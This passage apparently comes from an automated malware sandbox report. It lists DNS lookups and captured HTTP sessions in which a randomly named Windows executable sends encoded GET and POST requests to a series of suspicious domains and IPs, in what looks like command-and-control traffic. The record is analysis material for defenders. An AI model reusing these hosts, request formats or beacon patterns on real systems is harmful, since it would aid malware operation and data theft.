                                                                                  Nov 27, 2024 01:26:24.460850000 CET1.1.1.1192.168.2.50x64cbNo error (0)www.mrpokrovskii.pro194.85.61.76A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:00.700567961 CET1.1.1.1192.168.2.50x3e35No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:00.723803043 CET1.1.1.1192.168.2.50x3e35No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:16.642343044 CET1.1.1.1192.168.2.50x681eNo error (0)www.matteicapital.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:32.572633982 CET1.1.1.1192.168.2.50x7887No error (0)www.llljjjiii.shop8.210.114.150A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:32.572643042 CET1.1.1.1192.168.2.50x7887No error (0)www.llljjjiii.shop8.210.114.150A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:48.570683002 CET1.1.1.1192.168.2.50xbd4cNo error (0)www.ampsamkok88.shopampsamkok88.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:48.570683002 CET1.1.1.1192.168.2.50xbd4cNo error (0)ampsamkok88.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:27:48.570683002 CET1.1.1.1192.168.2.50xbd4cNo error (0)ampsamkok88.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:03.267591953 CET1.1.1.1192.168.2.50x74ceNo error (0)www.gogawithme.live209.74.77.109A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:18.328298092 CET1.1.1.1192.168.2.50xd201No error (0)www.54248711.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:33.324302912 CET1.1.1.1192.168.2.50x62d3No error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:48.535721064 CET1.1.1.1192.168.2.50x4886No error (0)www.questmatch.pro172.67.138.37A (IP address)IN (0x0001)false
                                                                                  Nov 27, 2024 01:28:48.535721064 CET1.1.1.1192.168.2.50x4886No error (0)www.questmatch.pro104.21.62.184A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.rtpterbaruwaktu3.xyz
                                                                                  • www.70kdd.top
                                                                                  • www.acond-22-mvr.click
                                                                                  • www.smartcongress.net
                                                                                  • www.mrpokrovskii.pro
                                                                                  • www.ytsd88.top
                                                                                  • www.matteicapital.online
                                                                                  • www.llljjjiii.shop
                                                                                  • www.ampsamkok88.shop
                                                                                  • www.gogawithme.live
                                                                                  • www.54248711.xyz
                                                                                  • www.canadavinreport.site
                                                                                  • www.questmatch.pro

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549735103.21.221.87803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:25:21.069041014 CET366OUTGET /7yx4/?005PE=aNcLxhD894SLKl&lH_L4=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag== HTTP/1.1
                                                                                  Host: www.rtpterbaruwaktu3.xyz
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:25:22.703896999 CET1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 27 Nov 2024 00:25:22 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.54977038.47.232.124803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:25:38.756294966 CET597OUTPOST /klhq/ HTTP/1.1
                                                                                  Host: www.70kdd.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.70kdd.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.70kdd.top/klhq/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 4c 46 4d 7a 71 53 38 62 36 45 71 67 62 71 59 68 4d 71 39 72 51 4a 47 65 42 72 6a 34 30 2b 78 58 33 6e 6a 2f 4a 67 3d
                                                                                  Data Ascii: lH_L4=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2cLFMzqS8b6EqgbqYhMq9rQJGeBrj40+xX3nj/Jg=
                                                                                  Nov 27, 2024 01:25:40.236278057 CET312INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:25:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66e01838-94"
                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.54977438.47.232.124803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:25:41.435967922 CET617OUTPOST /klhq/ HTTP/1.1
                                                                                  Host: www.70kdd.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.70kdd.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.70kdd.top/klhq/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 77 56 54 6b 33 4d 31 6f 39 46 36 34 34 75 4b 6a 33 31 46 31 65 46 7a 54 6e 62 6d 7a 44 6d 68 42 32 70 63 6f 78 75 47 38 49 55 69 4e 33 65 72 33 78 6a 37 5a 34 68 30 34 77 55 39 4b 44 67 30 42 43 65 32 74 38 53 41 30 50 63 4a 32 41 6d 31 56 68 66 35 65 67 65 39 6f 36 61 38 41 5a 36 62 70 46 69 7a 55 34 4b 69 4d 42 37 2b 6e 74 51 49 47 71 58 47 76 4a 74 52 35 31 79 32 70 37 30 59 70 38 53 73 4e 62 79 37 75 69 56 34 77 6c 2b 4f 53 6a 55 70 45 66 59 4e 55 33 54 68 65 33 77 69 64 30 33 72 68 4a 30 43 6c 4c 39 4d 67 6c 74 69 49 71 46
                                                                                  Data Ascii: lH_L4=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4wl+OSjUpEfYNU3The3wid03rhJ0ClL9MgltiIqF
                                                                                  Nov 27, 2024 01:25:43.001934052 CET312INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:25:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66e01838-94"
                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.54978038.47.232.124803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:25:44.092979908 CET1634OUTPOST /klhq/ HTTP/1.1
                                                                                  Host: www.70kdd.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.70kdd.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.70kdd.top/klhq/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 34 56 54 52 72 4d 36 72 46 46 39 34 34 75 55 7a 33 30 46 31 65 59 7a 54 2f 58 6d 7a 50 32 68 45 79 70 64 4c 35 75 50 74 49 55 73 4e 33 65 67 58 78 67 6c 70 35 70 30 34 67 51 39 4b 54 67 30 42 43 65 32 76 55 53 4a 41 62 63 47 57 41 68 38 31 68 44 39 65 67 32 39 72 4c 76 38 41 74 71 62 64 4a 69 7a 77 55 4b 78 4b 56 37 38 48 73 32 4c 47 71 50 47 75 31 49 52 39 63 42 32 70 2f 65 59 70 45 53 70 70 43 79 75 2b 6d 64 73 79 6c 39 44 44 2f 45 6f 69 66 69 56 48 44 39 70 74 6e 39 72 4f 6b 47 72 56 4e 78 50 56 4b 55 65 30 78 46 76 2f 76 33 64 4a 48 31 34 70 38 6d 48 4b 66 7a 48 76 78 44 4f 41 49 6d 37 54 36 48 57 51 38 66 41 68 77 4a 36 31 70 34 57 6f 6c 4d 4e 55 68 44 76 30 2f 39 41 54 41 7a 53 6e 49 39 67 6a 37 54 43 6f 54 76 52 70 34 71 6c 79 4a 63 50 48 4d 6a 73 47 59 48 53 42 47 69 6f 39 61 4c 56 51 33 73 71 71 73 4c 75 71 56 79 45 54 51 45 57 4f 6a 67 2f 6b 6b 34 [TRUNCATED]
                                                                                  Data Ascii: lH_L4=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+4VTRrM6rFF944uUz30F1eYzT/XmzP2hEypdL5uPtIUsN3egXxglp5p04gQ9KTg0BCe2vUSJAbcGWAh81hD9eg29rLv8AtqbdJizwUKxKV78Hs2LGqPGu1IR9cB2p/eYpESppCyu+mdsyl9DD/EoifiVHD9ptn9rOkGrVNxPVKUe0xFv/v3dJH14p8mHKfzHvxDOAIm7T6HWQ8fAhwJ61p4WolMNUhDv0/9ATAzSnI9gj7TCoTvRp4qlyJcPHMjsGYHSBGio9aLVQ3sqqsLuqVyETQEWOjg/kk4wLeVCvIPefDpUx8XxEo2lOCd+XN8KCs6gd54mZmQ3NC0rxX/bwBLbVrZxfKQoiMSrmr9mDsUVkffmoSDjbM8SXDom9AjoyTX7OrkTU8QiHcsLpgFNlbpibodLtrpOm9gFmo+nP4V5D2KilNr9fRqA0eKjeKQjq9L5Sj82jTV8iSODlemq1P0U+ZuF0T0N7+QTL7qSSuptd2/uqfL715OMoGaagrwY21iP9EqhpqYOlRzpYlZPlIn9R42ytRuFMlzWpGTp9f/cOt5ukuOVg3YgRSC9hXMasI/xfAFeFi8SKLBboR/odoa+afw65A51LpM8V3YIg20dONwA+rLU8Vb9eWKVNqPV0urqlezbJjl1EiRCV6qCaajDM/DWCFuERTUVw1RmlRRlPKfYff6dw3EUN3Rbq1FBnJN9R0Aguz4dvbiTpA3qLyJ5xVDEVstNvo6NCIIS41wiGs1WtV9MroWgtbQ//jO/Q8gEEddqVUC0RdZwDuH5reUabqzLqgLTEdPtDKetLqTtETqh8gmfzMXHQY6MyStYCm2tSWhqItqGefQeaOUiJZ/+EuYSjzmYDHmnW4GHVUnSEe/tgXSHcEi9SBpOXNSkeIhX0A4gkn6jbme2bd5UMuCYLUEE8TP5w68U+RgiKGKQplnVy69l/4vopW2NFE2zazfrM [TRUNCATED]
                                                                                  Nov 27, 2024 01:25:45.679646015 CET312INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:25:45 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66e01838-94"
                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.54978538.47.232.124803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:25:46.749102116 CET355OUTGET /klhq/?lH_L4=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.70kdd.top
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:25:48.315025091 CET312INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:25:48 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66e01838-94"
                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.549802199.59.243.227803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:25:53.915714979 CET624OUTPOST /w9z4/ HTTP/1.1
                                                                                  Host: www.acond-22-mvr.click
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.acond-22-mvr.click
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 55 2f 6f 62 54 59 45 72 4d 61 32 75 78 4f 6e 71 2b 43 4d 55 56 64 43 4d 2b 5a 6d 4e 76 64 44 2b 31 44 74 54 45 56 64 62 2f 72 46 41 79 55 32 55 38 62 30 33 46 2b 4a 52 77 70 47 49 54 42 38 38 53 46 46 42 34 4d 62 52 38 6d 6c 4d 51 61 53 44 4f 5a 51 50 52 4e 77 59 54 65 4a 42 7a 39 36 73 31 76 39 61 67 67 65 57 75 34 4b 31 5a 66 51 6c 37 34 45 54 45 35 71 36 72 54 36 68 73 44 53 30 6c 79 2b 72 4a 7a 79 61 39 41 43 4d 50 36 4a 68 6e 69 47 55 46 51 44 64 4e 75 35 77 57 4d 4d 65 69 69 75 31 44 55 73 6a 38 69 4e 76 79 56 61 41 6d 6e 73 43 42 51 61 71 6a 6f 3d
                                                                                  Data Ascii: lH_L4=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGUFQDdNu5wWMMeiiu1DUsj8iNvyVaAmnsCBQaqjo=
                                                                                  Nov 27, 2024 01:25:55.001492977 CET1236INHTTP/1.1 200 OK
                                                                                  date: Wed, 27 Nov 2024 00:25:54 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  content-length: 1138
                                                                                  x-request-id: e9b8151e-3d91-42b3-a485-0390852fd5a2
                                                                                  cache-control: no-store, max-age=0
                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                  set-cookie: parking_session=e9b8151e-3d91-42b3-a485-0390852fd5a2; expires=Wed, 27 Nov 2024 00:40:54 GMT; path=/
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                  Nov 27, 2024 01:25:55.001558065 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTliODE1MWUtM2Q5MS00MmIzLWE0ODUtMDM5MDg1MmZkNWEyIiwicGFnZV90aW1lIjoxNzMyNjY3MT


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.549808199.59.243.227803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:25:56.578525066 CET644OUTPOST /w9z4/ HTTP/1.1
                                                                                  Host: www.acond-22-mvr.click
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.acond-22-mvr.click
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
